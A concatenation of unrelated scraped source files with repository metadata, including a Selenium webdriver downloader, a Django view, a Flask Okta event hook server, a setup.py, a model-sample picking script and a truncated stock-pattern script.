            raise Exception("\nCould not find the specified geckodriver "
                            "version to download!\n")
    elif name == "edgedriver" or name == "msedgedriver":
        name = "edgedriver"
        use_version = DEFAULT_EDGEDRIVER_VERSION
        if num_args == 4 or num_args == 5:
            if "-p" not in sys.argv[3].lower():
                use_version = sys.argv[3]
                if use_version.lower() == "latest":
                    # No "latest" API is queried here; fall back to default.
                    use_version = DEFAULT_EDGEDRIVER_VERSION
            else:
                copy_to_path = True
        if num_args == 5:
            if "-p" in sys.argv[4].lower():
                copy_to_path = True
            else:
                invalid_run_command()
        if "win64" in sys_plat or "x64" in sys_plat:
            file_name = "edgedriver_win64.zip"
        elif "win32" in sys_plat or "x86" in sys_plat:
            file_name = "edgedriver_win32.zip"
        elif "darwin" in sys_plat:
            file_name = "edgedriver_mac64.zip"
        else:
            raise Exception("Sorry! Microsoft WebDriver / EdgeDriver is "
                            "only for Windows or Mac operating systems!")
        download_url = ("https://msedgedriver.azureedge.net/"
                        "%s/%s" % (use_version, file_name))
    elif name == "iedriver":
        major_version = "3.14"
        full_version = "3.14.0"
        use_version = full_version
        if "win32" in sys_plat:
            file_name = "IEDriverServer_Win32_%s.zip" % full_version
        elif "win64" in sys_plat or "x64" in sys_plat:
            file_name = "IEDriverServer_x64_%s.zip" % full_version
        else:
            raise Exception("Sorry! IEDriver is only for "
                            "Windows-based operating systems!")
        download_url = ("http://selenium-release.storage.googleapis.com/"
                        "%s/%s" % (major_version, file_name))
    elif name == "operadriver" or name == "operachromiumdriver":
        name = "operadriver"
        use_version = DEFAULT_OPERADRIVER_VERSION
        get_latest = False
        if num_args == 4 or num_args == 5:
            if "-p" not in sys.argv[3].lower():
                use_version = sys.argv[3]
                if use_version.lower() == "latest":
                    use_version = DEFAULT_OPERADRIVER_VERSION
            else:
                copy_to_path = True
        if num_args == 5:
            if "-p" in sys.argv[4].lower():
                copy_to_path = True
            else:
                invalid_run_command()
        # Opera zips contain a platform-named folder wrapping the driver.
        if "darwin" in sys_plat:
            file_name = "operadriver_mac64.zip"
            platform_code = "mac64"
            inner_folder = "operadriver_%s/" % platform_code
            expected_contents = (['operadriver_mac64/',
                                  'operadriver_mac64/operadriver',
                                  'operadriver_mac64/sha512_sum'])
        elif "linux" in sys_plat:
            file_name = "operadriver_linux64.zip"
            platform_code = "linux64"
            inner_folder = "operadriver_%s/" % platform_code
            expected_contents = (['operadriver_linux64/',
                                  'operadriver_linux64/operadriver',
                                  'operadriver_linux64/sha512_sum'])
        elif "win32" in sys_plat:
            file_name = "operadriver_win32.zip"
            platform_code = "win32"
            inner_folder = "operadriver_%s/" % platform_code
            expected_contents = (['operadriver_win32/',
                                  'operadriver_win32/operadriver.exe',
                                  'operadriver_win32/sha512_sum'])
        elif "win64" in sys_plat or "x64" in sys_plat:
            file_name = "operadriver_win64.zip"
            platform_code = "win64"
            inner_folder = "operadriver_%s/" % platform_code
            expected_contents = (['operadriver_win64/',
                                  'operadriver_win64/operadriver.exe',
                                  'operadriver_win64/sha512_sum'])
        else:
            raise Exception("Cannot determine which version of Operadriver "
                            "to download!")
        download_url = ("https://github.com/operasoftware/operachromiumdriver/"
                        "releases/download/"
                        "%s/%s" % (use_version, file_name))
    else:
        invalid_run_command()
    if file_name is None or download_url is None:
        invalid_run_command()
    file_path = downloads_folder + '/' + file_name
    if not os.path.exists(downloads_folder):
        os.mkdir(downloads_folder)
    print('\nDownloading %s from:\n%s ...' % (file_name, download_url))
    remote_file = requests.get(download_url)
    with open(file_path, 'wb') as file:
        file.write(remote_file.content)
    print('Download Complete!\n')
    if file_name.endswith(".zip"):
        zip_file_path = file_path
        zip_ref = zipfile.ZipFile(zip_file_path, 'r')
        contents = zip_ref.namelist()
        if len(contents) == 1:
            # Single-file archives: chromedriver / geckodriver-win / iedriver.
            if name == "operadriver":
                raise Exception("Zip file for OperaDriver is missing content!")
            for f_name in contents:
                # Remove existing version if exists
                new_file = downloads_folder + '/' + str(f_name)
                if "Driver" in new_file or "driver" in new_file:
                    if os.path.exists(new_file):
                        os.remove(new_file)  # Technically the old file now
            print('Extracting %s from %s ...' % (contents, file_name))
            zip_ref.extractall(downloads_folder)
            zip_ref.close()
            os.remove(zip_file_path)
            print('Unzip Complete!\n')
            for f_name in contents:
                new_file = downloads_folder + '/' + str(f_name)
                print("The file [%s] was saved to:\n%s\n" % (f_name, new_file))
                print("Making [%s %s] executable ..." % (f_name, use_version))
                make_executable(new_file)
                print("[%s] is now ready for use!" % f_name)
                if copy_to_path and os.path.exists(LOCAL_PATH):
                    path_file = LOCAL_PATH + f_name
                    shutil.copyfile(new_file, path_file)
                    make_executable(path_file)
                    print("Also copied to: %s" % path_file)
            print("")
        elif name == "edgedriver" or name == "msedgedriver":
            if "darwin" in sys_plat or "linux" in sys_plat:
                # Was expecting to be on a Windows OS at this point
                raise Exception("Unexpected file format for msedgedriver!")
            expected_contents = (['Driver_Notes/',
                                  'Driver_Notes/credits.html',
                                  'Driver_Notes/LICENSE',
                                  'msedgedriver.exe'])
            if len(contents) > 4:
                raise Exception("Unexpected content in EdgeDriver Zip file!")
            for content in contents:
                if content not in expected_contents:
                    raise Exception("Expected file [%s] missing from [%s]" % (
                        content, expected_contents))
            # Zip file is valid. Proceed.
            driver_path = None
            driver_file = None
            for f_name in contents:
                print(f_name)
                # Remove existing version if exists
                str_name = str(f_name)
                new_file = downloads_folder + '/' + str_name
                if str_name == "msedgedriver.exe":
                    driver_file = str_name
                    driver_path = new_file
                    if os.path.exists(new_file):
                        os.remove(new_file)
            if not driver_file or not driver_path:
                # Fixed message: this branch validates msedgedriver.exe, not
                # operadriver (the old text was copy-pasted from that branch).
                raise Exception("msedgedriver.exe missing from Zip file!")
            print('Extracting %s from %s ...' % (contents, file_name))
            zip_ref.extractall(downloads_folder)
            zip_ref.close()
            os.remove(zip_file_path)
            print('Unzip Complete!\n')
            to_remove = (['%s/Driver_Notes/credits.html' % downloads_folder,
                          '%s/Driver_Notes/LICENSE' % downloads_folder])
            for file_to_remove in to_remove:
                if os.path.exists(file_to_remove):
                    os.remove(file_to_remove)
            if os.path.exists(downloads_folder + '/' + "Driver_Notes/"):
                # Only works if the directory is empty
                os.rmdir(downloads_folder + '/' + "Driver_Notes/")
            print("The file [%s] was saved to:\n%s\n" % (
                driver_file, driver_path))
            print("Making [%s %s] executable ..." % (driver_file, use_version))
            make_executable(driver_path)
            print("[%s] is now ready for use!" % driver_file)
            print("")
        elif name == "operadriver":
            if len(contents) > 3:
                raise Exception("Unexpected content in OperaDriver Zip file!")
            # Zip file is valid. Proceed.
            driver_path = None
            driver_file = None
            for f_name in contents:
                # Remove existing version if exists
                str_name = str(f_name).split(inner_folder)[1]
                new_file = downloads_folder + '/' + str_name
                if str_name == "operadriver" or str_name == "operadriver.exe":
                    driver_file = str_name
                    driver_path = new_file
                    if os.path.exists(new_file):
                        os.remove(new_file)
            if not driver_file or not driver_path:
                raise Exception("Operadriver missing from Zip file!")
            print('Extracting %s from %s ...' % (contents, file_name))
            zip_ref.extractall(downloads_folder)
            zip_ref.close()
            os.remove(zip_file_path)
            print('Unzip Complete!\n')
            # The driver sits inside a platform folder; copy it up a level.
            inner_driver = downloads_folder + '/' + inner_folder + driver_file
            inner_sha = downloads_folder + '/' + inner_folder + "sha512_sum"
            shutil.copyfile(inner_driver, driver_path)
            print("The file [%s] was saved to:\n%s\n" % (
                driver_file, driver_path))
            print("Making [%s %s] executable ..." % (driver_file, use_version))
            make_executable(driver_path)
            print("[%s] is now ready for use!" % driver_file)
            if copy_to_path and os.path.exists(LOCAL_PATH):
                path_file = LOCAL_PATH + driver_file
                shutil.copyfile(driver_path, path_file)
                make_executable(path_file)
                print("Also copied to: %s" % path_file)
            # Clean up extra files
            if os.path.exists(inner_driver):
                os.remove(inner_driver)
            if os.path.exists(inner_sha):
                os.remove(inner_sha)
            if os.path.exists(downloads_folder + '/' + inner_folder):
                # Only works if the directory is empty
                os.rmdir(downloads_folder + '/' + inner_folder)
            print("")
        elif len(contents) == 0:
            raise Exception("Zip file %s is empty!" % zip_file_path)
        else:
            raise Exception("Expecting only one file in %s!" % zip_file_path)
    elif file_name.endswith(".tar.gz"):
        tar_file_path = file_path
        tar = tarfile.open(file_path)
        contents = tar.getnames()
        if len(contents) == 1:
            for f_name in contents:
                # Remove existing version if exists
                new_file = downloads_folder + '/' + str(f_name)
                if "Driver" in new_file or "driver" in new_file:
                    if os.path.exists(new_file):
                        os.remove(new_file)  # Technically the old file now
            print('Extracting %s from %s ...' % (contents, file_name))
            tar.extractall(downloads_folder)
            tar.close()
            os.remove(tar_file_path)
            print('Unzip Complete!\n')
            for f_name in contents:
                new_file = downloads_folder + '/' + str(f_name)
                print("The file [%s] was saved to:\n%s\n" % (f_name, new_file))
                print("Making [%s %s] executable ..." % (f_name, use_version))
                make_executable(new_file)
                print("[%s] is now ready for use!" % f_name)
                if copy_to_path and os.path.exists(LOCAL_PATH):
                    path_file = LOCAL_PATH + f_name
                    shutil.copyfile(new_file, path_file)
                    make_executable(path_file)
                    print("Also copied to: %s" % path_file)
            print("")
        elif len(contents) == 0:
            raise Exception("Tar file %s is empty!" % tar_file_path)
        else:
            raise Exception("Expecting only one file in %s!" % tar_file_path)
    else:
        # Not a .zip file or a .tar.gz file. Just a direct download.
        if "Driver" in file_name or "driver" in file_name:
            print("Making [%s] executable ..." % file_name)
            make_executable(file_path)
            print("[%s] is now ready for use!" % file_name)
            print("Location of [%s]:\n%s\n" % (file_name, file_path))
if __name__ == "__main__":
    # Allow direct invocation: `python sb_install.py` (args parsed from sys.argv).
    main()
| 45.6841
| 79
| 0.555754
|
4a112be894a1ccede23cefcc2cda63acd5618b15
| 107
|
py
|
Python
|
querv/__init__.py
|
boweeb/querv
|
23f832018d915fe46ff85bd62b3fdd662328ae2e
|
[
"0BSD"
] | null | null | null |
querv/__init__.py
|
boweeb/querv
|
23f832018d915fe46ff85bd62b3fdd662328ae2e
|
[
"0BSD"
] | null | null | null |
querv/__init__.py
|
boweeb/querv
|
23f832018d915fe46ff85bd62b3fdd662328ae2e
|
[
"0BSD"
] | null | null | null |
# -*- coding: utf-8 -*-
# Package metadata for querv; __version__ is the single source of truth
# for the release number.
__author__ = 'Jesse Butcher'
__email__ = 'boweeb@gmail.com'
__version__ = '0.2.0'
| 17.833333
| 30
| 0.64486
|
4a112c5907f0191d437cac62a30bb1c6e91a8e88
| 648
|
py
|
Python
|
django_hotel/src/home/views.py
|
darkares23/django-hotelSite
|
71886deb27bad291d03bd7e5a2a64f63b6f889e0
|
[
"MIT"
] | null | null | null |
django_hotel/src/home/views.py
|
darkares23/django-hotelSite
|
71886deb27bad291d03bd7e5a2a64f63b6f889e0
|
[
"MIT"
] | null | null | null |
django_hotel/src/home/views.py
|
darkares23/django-hotelSite
|
71886deb27bad291d03bd7e5a2a64f63b6f889e0
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from property.models import Category, Property
from agents.models import Agent
from django.db.models import Count
# Create your views here.
def home(request):
    """Render the landing page with categories (annotated with the number of
    properties in each), all properties, and all agents."""
    categories = Category.objects.annotate(
        property_count=Count('property')).values('category_name', 'property_count', 'image')
    context = {
        'category_list_home': categories,
        'property_list_home': Property.objects.all(),
        'agent_list_home': Agent.objects.all(),
    }
    return render(request, 'home/home.html', context)
| 29.454545
| 92
| 0.717593
|
4a112c623505c3c5998b80c32485f8d106563b7a
| 2,020
|
py
|
Python
|
exercises/en/test_02_11.py
|
UBC-MDS/exploratory-data-viz
|
83b704ce10d1ff5e10bfd4cdfa872ac52993fd54
|
[
"CC-BY-4.0"
] | null | null | null |
exercises/en/test_02_11.py
|
UBC-MDS/exploratory-data-viz
|
83b704ce10d1ff5e10bfd4cdfa872ac52993fd54
|
[
"CC-BY-4.0"
] | 88
|
2020-12-04T06:56:51.000Z
|
2021-05-10T22:02:45.000Z
|
exercises/en/test_02_11.py
|
UBC-MDS/exploratory-data-viz
|
83b704ce10d1ff5e10bfd4cdfa872ac52993fd54
|
[
"CC-BY-4.0"
] | 4
|
2021-01-13T09:30:57.000Z
|
2021-08-03T20:49:31.000Z
|
def test():
    # Here we can either check objects created in the solution code, or the
    # string value of the solution, available as __solution__. A helper for
    # printing formatted messages is available as __msg__. See the testTemplate
    # in the meta.json for details.
    # If an assertion fails, the message will be displayed
    # Since we haven't started assigning charts to variable names yet,
    # this might be the better way to test for the first exercise.
    # Maybe even for later exercises.
    # NOTE(review): penguin_bar, penguins_df, alt and __msg__ are injected into
    # this function's scope by the exercise grader -- they are not defined here.
    assert not penguin_bar is None, "Your answer does not exist. Have you passed in the correct variable?"
    assert type(penguin_bar) == type(alt.Chart()), "Your answer is not an Altair Chart object. Check to make sure that you have assigned an alt.Chart object to penguin_bar."
    assert penguin_bar.data.equals(penguins_df) and penguin_bar.data.shape == (344, 7), "Make sure you are using the penguins dataset."
    assert penguin_bar.mark == 'bar', "Make sure you are using the bar mark type."
    # Either .shorthand or .field may hold the encoding, depending on how the
    # student specified it, so both attributes are checked.
    assert (penguin_bar.encoding.x.shorthand in {'count()', 'count():quantitative', 'count():Q'} or
            penguin_bar.encoding.x.field in {'count()', 'count():quantitative', 'count():Q'}), "Make sure you are using 'count()' as the x-axis encoding."
    assert (penguin_bar.encoding.y.field in {'species', 'species:nominal', 'species:N'} or
            penguin_bar.encoding.y.shorthand in {'species', 'species:nominal', 'species:N'}), "Make sure you are using 'species' as the y-axis encoding."
    assert penguin_bar.encoding.y.sort != alt.utils.schemapi.Undefined, "Make sure you specify the sort argument for the y-axis encoding."
    assert type(penguin_bar.title) == str and len(penguin_bar.title) >= 5, "Make sure you specify a descriptive title for the penguin_bar plot."
    assert penguin_bar.height == 150, "Make sure you specify the plot height of 150."
    assert penguin_bar.width == 300, "Make sure you specify the plot width of 300."
    __msg__.good("You're correct, well done!")
| 84.166667
| 173
| 0.715842
|
4a112dbdf61f6110f77f524914a01b186769246f
| 2,133
|
py
|
Python
|
update-sha1sums.py
|
LoneWolfSG/android_device_xiaomi_msm8937-common
|
c866c0846812b29f80c6fa0cc7de2c7cf11311ee
|
[
"Apache-2.0"
] | 10
|
2018-08-11T16:51:50.000Z
|
2021-09-06T06:04:25.000Z
|
update-sha1sums.py
|
LoneWolfSG/android_device_xiaomi_msm8937-common
|
c866c0846812b29f80c6fa0cc7de2c7cf11311ee
|
[
"Apache-2.0"
] | 1
|
2018-12-06T12:55:25.000Z
|
2018-12-08T13:30:44.000Z
|
update-sha1sums.py
|
LoneWolfSG/android_device_xiaomi_msm8937-common
|
c866c0846812b29f80c6fa0cc7de2c7cf11311ee
|
[
"Apache-2.0"
] | 51
|
2018-08-21T09:49:42.000Z
|
2022-03-05T16:17:30.000Z
|
#!/usr/bin/env python
#
# Copyright (C) 2016 The CyanogenMod Project
# Copyright (C) 2017-2018 The LineageOS Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from hashlib import sha1
import sys
device = 'msm8937-common'
vendor = 'xiaomi'
# Read the proprietary blob list once; the context manager guarantees the
# handle is closed (the original left the open() handle dangling).
with open('proprietary-files-qc.txt', 'r') as _blob_list:
    lines = [line for line in _blob_list]
vendorPath = '../../../vendor/' + vendor + '/' + device + '/proprietary'
needSHA1 = False
def cleanup():
    """Strip any '|<sha1>' suffix from every entry, rewriting `lines` in place."""
    for idx, raw in enumerate(lines):
        entry = raw[:-1]  # drop the trailing '\n'
        # Leave blank lines and comments untouched
        if not entry or entry.startswith('#'):
            continue
        # split('|') is a no-op for entries without a recorded hash
        lines[idx] = '%s\n' % (entry.split('|')[0])
def update():
    """Recompute and append SHA1 hashes ('<entry>|<sha1>') for blob entries.

    Only entries below a section comment containing ' - from' get a hash;
    other sections are left untouched. Rewrites the global `lines` in place.
    """
    # Bug fix: needSHA1 was previously assigned only inside the loop, making
    # it function-local; reading it before the first comment line raised
    # UnboundLocalError. Initialize it explicitly.
    needSHA1 = False
    for index, line in enumerate(lines):
        # Remove '\n' character
        line = line[:-1]
        # Skip empty lines
        if len(line) == 0:
            continue
        # Section comments toggle hashing for the entries that follow
        if line[0] == '#':
            needSHA1 = (' - from' in line)
            continue
        if needSHA1:
            # Remove existing SHA1 hash
            line = line.split('|')[0]
            # 'target:source' entries hash the source path; plain entries hash
            # the entry itself. A leading '-' marker is not part of the path.
            filePath = line.split(':')[1] if len(line.split(':')) == 2 else line
            if filePath[0] == '-':
                filePath = filePath[1:]
            # Context manager closes the handle (the original leaked it)
            with open('%s/%s' % (vendorPath, filePath), 'rb') as blob:
                digest = sha1(blob.read()).hexdigest()
            lines[index] = '%s|%s\n' % (line, digest)
# Entry point: '-c' strips the recorded hashes, the default run recomputes them.
if len(sys.argv) == 2 and sys.argv[1] == '-c':
    cleanup()
else:
    update()
# Persist the (possibly rewritten) list back to disk. The with-statement
# closes the handle, so the original redundant file.close() was removed.
with open('proprietary-files-qc.txt', 'w') as file:
    for line in lines:
        file.write(line)
| 74
| 0.622597
|
4a11316144762ad2afcdb770d02133cd45d8bf9f
| 985
|
py
|
Python
|
tools/python-okta-eventhook-server/flask-app.py
|
flypenguin/scripts-misc
|
e29fcdcf349dbf4e70a33dfb7f9d2a190d64636a
|
[
"MIT"
] | 3
|
2019-08-23T00:59:19.000Z
|
2022-02-22T02:39:01.000Z
|
tools/python-okta-eventhook-server/flask-app.py
|
flypenguin/scripts-misc
|
e29fcdcf349dbf4e70a33dfb7f9d2a190d64636a
|
[
"MIT"
] | null | null | null |
tools/python-okta-eventhook-server/flask-app.py
|
flypenguin/scripts-misc
|
e29fcdcf349dbf4e70a33dfb7f9d2a190d64636a
|
[
"MIT"
] | 4
|
2020-07-29T15:01:57.000Z
|
2021-05-03T16:02:48.000Z
|
#!/usr/bin/env python
from flask import Flask
from flask import request
from flask.views import View
from json import dumps
from time import time
from datetime import datetime as dt
from os import mkdir
from os.path import join
app = Flask(__name__)
timestamp = dt.now().strftime("%Y-%m-%d_%H.%M.%S")
dirname = f"events-{timestamp}"
counter = 0
@app.route("/health", methods=["GET"])
def get_health():
    """Liveness probe: always reports healthy."""
    return ("OK", 200)
@app.route("/", methods=["GET"])
def get_verify():
    """Answer Okta's one-time event hook endpoint verification challenge."""
    challenge = request.headers.get("X-Okta-Verification-Challenge", "nope")
    response = {"verification": challenge}
    print("Verification: ", response)
    return response, 200
@app.route("/", methods=["POST"])
def post_event():
    """Persist each incoming event payload to a numbered file in dirname."""
    global counter
    payload = request.get_json()
    if payload:
        with open(join(dirname, f"{counter}"), "w") as outfile:
            outfile.write(dumps(payload, indent=2))
        counter += 1
    return "", 200
if __name__ == "__main__":
    # Create the per-run output directory (named with the start timestamp)
    # before serving; post_event() writes one file per received event there.
    mkdir(dirname)
    app.run()
| 20.520833
| 79
| 0.652792
|
4a113293f0483ffdbbf66af67bf696237c5a70d9
| 2,235
|
py
|
Python
|
setup.py
|
abingham/swagger-to
|
a1ef9f46561d39809da0e6ab356427a247815d92
|
[
"MIT"
] | null | null | null |
setup.py
|
abingham/swagger-to
|
a1ef9f46561d39809da0e6ab356427a247815d92
|
[
"MIT"
] | null | null | null |
setup.py
|
abingham/swagger-to
|
a1ef9f46561d39809da0e6ab356427a247815d92
|
[
"MIT"
] | null | null | null |
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
import os
from setuptools import setup, find_packages
# pylint: disable=redefined-builtin
# Resolve paths relative to this file so the build works from any CWD.
here = os.path.abspath(os.path.dirname(__file__))  # pylint: disable=invalid-name
with open(os.path.join(here, 'README.rst'), encoding='utf-8') as f:
    long_description = f.read()  # pylint: disable=invalid-name
# Package metadata and build configuration for swagger-to.
setup(
    name='swagger_to',
    version='4.0.1',  # Don't forget to update changelog!
    description='Generate server and client code from Swagger (OpenAPI 2.0) specification',
    long_description=long_description,
    url='https://github.com/Parquery/swagger-to',
    author='Marko Ristin',
    author_email='marko@parquery.com',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
    ],
    license="License :: OSI Approved :: MIT License",
    keywords='swagger code generation python elm go typescript server client angular',
    packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
    install_requires=['pyyaml>=3.12', 'jinja2>=2.10,<3', 'icontract>=2.0.1,<3', 'jsonschema>=3,<4'],
    # Development-only tooling, installed via `pip install .[dev]`.
    extras_require={
        'dev': [
            'mypy==0.782',
            'pylint==2.5.3',
            'yapf==0.20.2',
            'pydocstyle>=3.0.0,<4',
            'requests_mock>=1.8.0',
        ],
    },
    py_modules=['swagger_to'],
    # py.typed marks the package as PEP 561 type-annotated.
    package_data={"swagger_to": ["py.typed"]},
    # Console scripts exposing the individual code generators.
    entry_points={
        'console_scripts': [
            'swagger_to_go_server.py = swagger_to.bin.swagger_to_go_server:main',
            'swagger_to_py_client.py = swagger_to.bin.swagger_to_py_client:main',
            'swagger_to_ts_angular5_client.py = swagger_to.bin.swagger_to_ts_angular5_client:main',
            'swagger_to_elm_client.py = swagger_to.bin.swagger_to_elm_client:main',
            'swagger_style.py = swagger_to.bin.swagger_style:main',
        ],
    })
| 37.881356
| 100
| 0.6434
|
4a1132d3acb5ab204cccfdfd98dd05f64066146d
| 7,791
|
py
|
Python
|
sources/concept_analysis/ilp_samples/picking.py
|
lthamm/concept-embeddings-and-ilp
|
27592c6424147a2fbb54d7daebc92cd72b3f4a0c
|
[
"MIT"
] | 3
|
2020-11-02T12:21:29.000Z
|
2021-08-02T14:01:37.000Z
|
sources/concept_analysis/ilp_samples/picking.py
|
lthamm/concept-embeddings-and-ilp
|
27592c6424147a2fbb54d7daebc92cd72b3f4a0c
|
[
"MIT"
] | 2
|
2020-11-06T07:58:13.000Z
|
2022-03-13T16:11:30.000Z
|
sources/concept_analysis/ilp_samples/picking.py
|
lthamm/concept-embeddings-and-ilp
|
27592c6424147a2fbb54d7daebc92cd72b3f4a0c
|
[
"MIT"
] | 1
|
2020-11-03T14:54:16.000Z
|
2020-11-03T14:54:16.000Z
|
"""Functions to evaluate the main model and pick according samples for ILP.
Run as script from project root as
`python3 script/picking.py`
When called as script, will pick for each prediction class the same amount of samples from the test
set that are closest to the decision boundary and copy those images into a destination folder.
For the settings see the settings section.
"""
import os
import shutil
from typing import Union, List, Iterable
import PIL.Image
import numpy as np
import pandas as pd
import torch
import torchvision as tv
from tqdm import tqdm
import model
from sources.model.finetuning import model_loaders
to_tens = tv.transforms.ToTensor()
to_img = tv.transforms.ToPILImage()
def get_model_results(model: torch.nn.Module,
                      dataset_root: str,
                      save_as: str = None,
                      device: Union[torch.device, str] = None,
                      splits: Iterable[str] = ('train', 'test'),
                      gt_classes: Iterable[str] = ('pos', 'neg')) -> pd.DataFrame:
    """Collect model predictions for every sample below dataset_root.

    Expects the directory layout
    dataset_root > split > ground_truth_class > <image files>.

    :param model: the model to evaluate
    :param dataset_root: root directory of the dataset
    :param save_as: optional .csv file path the results are written to (overwrites!)
    :param device: if given, the device to run on
    :param splits: dataset splits to evaluate
    :param gt_classes: ground truth classes to evaluate
    :return: per-image predictions annotated with 'split' and 'ground_truth'
    """
    per_folder: List[pd.DataFrame] = []
    with torch.no_grad():
        for split in splits:
            for gt_class in gt_classes:
                sub_dir = os.path.join(dataset_root, split, gt_class)
                desc = "{}, {}".format(split, gt_class)
                preds = get_model_results_for_folder(
                    model, sub_dir, device=device, pbar_desc=desc)
                per_folder.append(preds.assign(split=split, ground_truth=gt_class))
    combined = pd.concat(per_folder, ignore_index=True)
    if save_as is not None:
        combined.to_csv(save_as)
    return combined
def get_model_results_for_folder(model: torch.nn.Module, folder: str,
                                 device: Union[torch.device, str] = None,
                                 pbar_desc: str = None) -> pd.DataFrame:
    """Run the model on every '.png' image directly inside folder.

    All non-directory entries of folder ending in '.png' are assumed to be
    images loadable via PIL.Image.open. The model must map a batch to a 2D
    tensor of binary predictions; its sigmoid output is recorded per image.

    :param model: the model to use
    :param folder: directory searched (non-recursively) for image files
    :param device: if given, the device the model is moved onto first
    :param pbar_desc: description shown on the progress bar
    :return: DataFrame with columns 'img' (file name relative to folder)
        and 'pred' (float sigmoid of the model output)
    """
    with torch.no_grad():
        model.eval()
        if device is not None:
            model.to(device)
        image_names = [name for name in os.listdir(folder)
                       if os.path.isfile(os.path.join(folder, name))
                       and name.endswith('.png')]
        records = []
        for name in tqdm(image_names, desc=pbar_desc):  # TODO: batch-processing
            image = PIL.Image.open(os.path.join(folder, name))
            tensor = to_tens(image).to(device)
            score = torch.sigmoid(model(tensor.unsqueeze(0)).squeeze(0))
            records.append({'img': name, 'pred': float(score)})
        return pd.DataFrame(records)
def select_by_decision_boundary(preds: pd.DataFrame, num_imgs: int) -> List[str]:
    """Pick the num_imgs samples whose prediction is closest to 0.5.

    preds must provide the columns 'pred', 'split', 'ground_truth', and 'img'.
    The returned paths have the form split/ground_truth/img, i.e. they are
    relative to the dataset root the predictions were collected from.
    """
    # distance of each prediction to the 0.5 decision boundary
    dist = np.abs(preds.pred - 0.5)
    closest = (preds.assign(dist_to_border=dist)
               .sort_values(by=['dist_to_border'])
               .head(num_imgs))
    # assemble the relative paths split/ground_truth/img
    return [os.path.join(row.split, row.ground_truth, row.img)
            for row in closest.itertuples()]
def create_samples_folder(model: torch.nn.Module, dataset_root: str, dest_root: str,
                          num_imgs_per_cls: int,
                          splits: Iterable[str] = None,
                          csv_file: str = None, device: Union[str, torch.device] = None):
    """Copy the samples closest to the model's decision boundary into dest_root.

    The layout dataset_root > split > ('pos'|'neg') > *.png is mirrored under
    dest_root; the per-split collections can then serve as samples_root for
    generating ILP samples from analysis results. For each prediction class
    (positive: pred > 0.5, negative: pred <= 0.5) at most num_imgs_per_cls
    images are selected.

    :param model: model whose decision boundary determines the selection
    :param dataset_root: root directory holding the samples (layout above)
    :param dest_root: destination root for the copies; must not exist yet!
    :param num_imgs_per_cls: number of images to select per prediction class
    :param splits: splits to select samples from; defaults to ('test',)
    :param csv_file: intermediate CSV file for the prediction information
        (existing files are overwritten)
    :param device: the device to use for acquiring the model output
    """
    splits = splits or ('test',)
    if os.path.exists(dest_root):
        raise FileExistsError("dest_root {} exists!".format(dest_root))

    # collect predictions (optionally cached to csv_file) and restrict to splits
    predictions = get_model_results(model, dataset_root, save_as=csv_file,
                                    device=device, splits=splits)
    predictions = predictions[predictions.split.isin(splits)]

    # select the samples nearest to the boundary, per prediction class
    selected = select_by_decision_boundary(predictions[predictions.pred > 0.5],
                                           num_imgs_per_cls)
    selected += select_by_decision_boundary(predictions[predictions.pred <= 0.5],
                                            num_imgs_per_cls)

    # mirror the directory structure under dest_root and copy the files
    for rel_path in selected:
        target: str = os.path.join(dest_root, rel_path)
        os.makedirs(os.path.dirname(target), exist_ok=True)
        shutil.copy(os.path.join(dataset_root, rel_path), target)
# Number of samples to pick per prediction class (positive / negative).
NUM_IMGS_PER_CLS: int = 50

if __name__ == '__main__':
    # region SETTINGS
    # ---------------
    PROJECT_ROOT = "."  # assume that the script is called from project root
    model_pkl_file = os.path.join(PROJECT_ROOT, "alexnet_finetuned.pkl")
    # Load the finetuned state and wrap it in the modified AlexNet.
    MODEL = model_loaders.modified_alexnet(torch.load(model_pkl_file))
    DEVICE = 'cuda'
    DATASET_ROOT = os.path.join(PROJECT_ROOT, "dataset", "fasseg", "picasso_dataset")
    # NOTE(review): `model` below is the imported module (`import model` at file
    # top), not the MODEL instance — presumably `model.model_id` derives a
    # stable identifier from the name and pickle path; confirm against the
    # `model` module.
    DEST_ROOT = os.path.join(
        PROJECT_ROOT, "dataset", "{}_ilp_samples".format(model.model_id(model_name="AlexNet",
                                                                        model_pkl_file=model_pkl_file)))
    # Intermediate predictions CSV, named after the model class.
    CSV_FILE = os.path.join(PROJECT_ROOT, "models",
                            '{}_preds_test.csv'.format(MODEL.__class__.__name__.lower()))
    # endregion
    create_samples_folder(
        model=MODEL,
        dataset_root=DATASET_ROOT,
        dest_root=DEST_ROOT,
        num_imgs_per_cls=NUM_IMGS_PER_CLS,
        csv_file=CSV_FILE,
        device=DEVICE,
        splits=('test',)
    )
| 45.829412
| 104
| 0.676293
|
4a11336e35d30d6ba50bff36622bc2274a532100
| 1,319
|
py
|
Python
|
piercing_pattern.py
|
SamrathPalSingh/website-scripts
|
e852eb9b9153616ce9ac109820a4b912e57dba9a
|
[
"MIT"
] | null | null | null |
piercing_pattern.py
|
SamrathPalSingh/website-scripts
|
e852eb9b9153616ce9ac109820a4b912e57dba9a
|
[
"MIT"
] | null | null | null |
piercing_pattern.py
|
SamrathPalSingh/website-scripts
|
e852eb9b9153616ce9ac109820a4b912e57dba9a
|
[
"MIT"
] | null | null | null |
from trend import trend
import requests

# print(trend("AAPL"))
# --- check for the previous trend ---
# --- a downward trend is required for this pattern ---

# Fetch the last two daily candles for the symbol from Finnhub.
url = ('https://finnhub.io/api/v1/stock/candle?symbol=' + "AAPL"
       + '&resolution=D&count=2&token=bq24qknrh5rc5ioodhhg')
r = requests.get(url)
# Parse the JSON once instead of re-requesting/re-parsing per field.
candles = r.json()

# Candle 0 is the older day, candle 1 the most recent one
# (c = close, h = high, l = low, o = open).
c0, h0, l0, o0 = candles['c'][0], candles['h'][0], candles['l'][0], candles['o'][0]
